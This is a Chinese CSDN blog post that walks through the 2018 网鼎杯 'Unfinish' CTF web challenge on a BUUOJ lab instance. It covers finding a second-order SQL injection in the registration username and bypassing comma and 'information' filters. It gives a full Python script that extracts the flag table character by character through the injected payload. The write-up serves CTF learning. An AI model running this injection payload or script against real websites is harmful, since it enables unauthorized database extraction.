[网鼎杯2018]Unfinish

最新推荐文章于 2022-07-22 13:23:50 发布
最新推荐文章于 2022-07-22 13:23:50 发布
阅读量2.1k 收藏 5
点赞数 6
分类专栏: sql注入 # ctf做题记录 文章标签: ctf mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115733073
版权

场景
在这里插入图片描述
既然有login.php那就会有register.php,访问。
在这里插入图片描述
注册一个账号进去。
在这里插入图片描述
登录进去后看到我们的用户名了。
在这里插入图片描述
猜测在用户名处存在二次注入,再注册一个账号。
在这里插入图片描述
在这里插入图片描述
用户名变成了0,证明存在二次注入。

fuzz之后发现逗号,information等许多关键字被过滤了。

绕过方法:
mysql中,+只能当做运算符。
执行select '1'+'1a'时 结果
在这里插入图片描述
执行select '0'+database();
在这里插入图片描述
编程了0,但我们可以用ascii编码进行计算。
select '0'+ascii(substr(database(),1,1));
在这里插入图片描述
出来了库名第一位的ascii值。回到题目
因为过滤了逗号,所以用from for来代替
0'+ascii(substr(database() from 1 for 1))+'0;
在这里插入图片描述
在这里插入图片描述
成功回显,因为过滤了information,只能猜测字段名为flag
自己写了个脚本:

import requests
import logging
import re
from time import sleep

# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)

def search():
    flag = ''
    url = 'http://b52b0533-2f84-4c9b-bd73-e912ab23a59f.node3.buuoj.cn/'
    url1 = url+'register.php'
    url2 = url+'login.php'
    for i in range(100):
        sleep(0.3)#不加sleep就429了QAQ
        data1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
        data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}
        r1 = requests.post(url1, data=data1)
        r2 = requests.post(url2, data=data2)
        res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
        res1 = re.search(r'\d+', res.group())
        flag = flag+chr(int(res1.group()))
        print(flag)
    print("final:"+flag)

if __name__ == '__main__':
    search()

在这里插入图片描述

fmyyy1
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
网鼎杯密码题
05-01
网鼎杯密码题chaoyang.txt,加密方式暂不说,想知道解题流程可以讨论
[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽
最新发布
不会编程的崽的博客
03-26 1045
网鼎杯 二次注入 盲注
网鼎杯 2018 unfinish
feng的博客
10-29 2670
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
Part_CAE_Unfinish.rar
06-15
适用初学者实例的分析案例,有助于童鞋们对有限元分析的了解。
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 697
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1097
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 752
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1066
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
XCTFunfinish2018网鼎杯)(SQL二次注入)
羽的博客
09-14 996
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
[CTF 真题] 2018-网鼎杯-Web-Unfinish
weixin_43586169的博客
07-22 1048
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
2018years niteen Match unfinish homework
cx1975305741的博客
03-19 427
I am sorry,this is my first day  write boke that one thing is my unfinesh homework. I can't open tensorboard in ubuntu.
[网鼎杯2018]Unfinish&&CTFSHOW内部赛签到题
Je3Z的博客
07-15 1557
CTFSHOW那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下 然后扫目录的时候有源码泄露www.zip,下载后读下代码 user.php <?php include('db.php'); session_start(); error_reporting(0); if($_SESSION['u']){ $username=$_SESSION['u']; if (is_numeric($username)) { if(strl
网络安全的“奥运会”——第三届“网鼎杯”网络安全大赛即将开幕
ichunqiu2018的博客
06-22 1513
#网络安全“奥运会”来了! 乘风破浪潮头立,为国铸鼎正当时!由公安部指导,“政产学研用”各领域权威共襄盛举的第三届“网鼎杯”网络安全大赛如约而至,欢迎各行业各领域积极报名参与,报名链接https://www.wangdingcup.com...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值